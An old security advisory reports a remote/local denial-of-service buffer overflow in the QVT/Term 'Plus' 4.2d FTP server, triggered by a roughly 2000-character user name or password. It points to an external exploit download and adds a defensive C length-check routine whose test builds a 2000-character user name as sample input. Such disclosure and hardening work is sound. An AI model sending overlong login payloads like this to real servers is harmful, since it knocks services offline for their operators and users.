COMMAND

    QVT/Term 'Plus'

SYSTEMS AFFECTED

    QVT/Term 'Plus' 4.2d FTP Server

PROBLEM

    UssrLabs found a local/remote DoS attack in the QVT/Term 'Plus' 4.2d
    FTP Server.  The buffer overflow is caused by a long user name /
    password (2000 characters) and the re-connection to the FTP
    server.  There is not much to expand on; it is just a simple hole.
    For example, go to:

        http://www.ussrback.com/qvtfs42/

    for the source / binary of this remote / local DoS.  The original
    posting included a MIME-encoded copy of it (qvtftp42.zip).


SOLUTION

    Nothing yet.
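
    Added example, not part of the original advisory and not the vendor's
    code: a server-side length check of the kind that prevents an overflow
    from an overlong USER/PASS argument.  The function name, MAX_LINE and
    MAX_ARG are assumptions; 500 and 501 are the standard FTP syntax-error
    replies.

```c
#include <stdio.h>
#include <string.h>

#define MAX_LINE 512  /* assumed cap on one control-channel line */
#define MAX_ARG  64   /* assumed cap on a user name or password  */

/* Validate one FTP control line ("USER name\r\n" or "PASS secret\r\n") and
 * copy its argument into out only if it fits. `len` is the byte count from
 * the socket read, so strlen() is never run on untrusted data.
 * Returns 0 if accepted, else the FTP reply code to send (500 or 501). */
int parse_login_line(const char *line, size_t len, char *out, size_t out_sz)
{
    if (out_sz == 0) return 500;
    out[0] = '\0';
    if (len > MAX_LINE) return 500;              /* line too long */
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;                                   /* strip CRLF */
    if (len < 4 || (memcmp(line, "USER", 4) != 0 && memcmp(line, "PASS", 4) != 0))
        return 500;                              /* not a login command */
    if (len < 6 || line[4] != ' ')
        return 501;                              /* missing argument */
    const char *arg = line + 5;
    size_t arg_len = len - 5;
    if (arg_len > MAX_ARG || arg_len >= out_sz)
        return 501;                              /* would not fit: refuse, do not truncate */
    for (size_t i = 0; i < arg_len; i++)
        if ((unsigned char)arg[i] < 0x20 || arg[i] == 0x7f)
            return 501;                          /* NUL or control byte */
    memcpy(out, arg, arg_len);
    out[arg_len] = '\0';
    return 0;
}

int main(void)
{
    char user[MAX_ARG + 1];
    char big[2100];                              /* constructed sample input */
    memcpy(big, "USER ", 5);
    memset(big + 5, 'A', 2000);                  /* 2000-character user name */
    memcpy(big + 2005, "\r\n", 2);

    printf("normal : %d\n", parse_login_line("USER alice\r\n", 12, user, sizeof user));
    printf("2000 ch: %d\n", parse_login_line(big, 2007, user, sizeof user));
    return 0;
}
```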